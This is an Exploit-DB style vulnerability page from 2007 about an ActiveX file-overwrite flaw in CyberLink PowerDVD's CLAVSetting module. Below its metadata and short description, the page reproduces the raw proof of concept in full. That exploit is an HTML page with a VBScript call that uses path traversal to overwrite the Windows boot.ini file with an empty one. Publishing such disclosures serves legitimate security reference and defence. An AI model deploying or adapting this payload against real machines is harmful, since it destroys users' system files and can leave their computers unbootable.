header-logo
Suggest Exploit
vendor:
PowerDVD CLAVSetting Module
by:
rgod
7.5
CVSS
HIGH
Arbitrary Remote Rewrite DoS
CWE
Product Name: PowerDVD CLAVSetting Module
Affected Version From: 1.00.1829
Affected Version To: 1.00.1829
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CyberLink PowerDVD CLAVSetting Module Arbitrary Remote Rewrite DoS

The CyberLink PowerDVD CLAVSetting Module (CLAVSetting.DLL 1.00.1829) allows an attacker to overwrite files with an empty one. This vulnerability is installed by default on Acer Travelmate series. The extension of the files being overwritten does not matter.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

<!--
CyberLink PowerDVD CLAVSetting Module (CLAVSetting.DLL 1.00.1829) arbitrary remote rewrite dos

this is installed by default on Acer Travelmate series
allows to overwrite files with an empty one
extension doesn't matter

object safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller

rgod
-->
<html>
<object classid='clsid:0990EDE2-3498-43D0-971D-D5321C893210' id='CLSetting' /></object>
<script language='vbscript'>
CLSetting.CreateNewFile "..\..\..\..\..\..\..\..\boot.ini"
</script>
</html>

# milw0rm.com [2007-10-01]

Navigation

Suggest Exploit

Services By CQR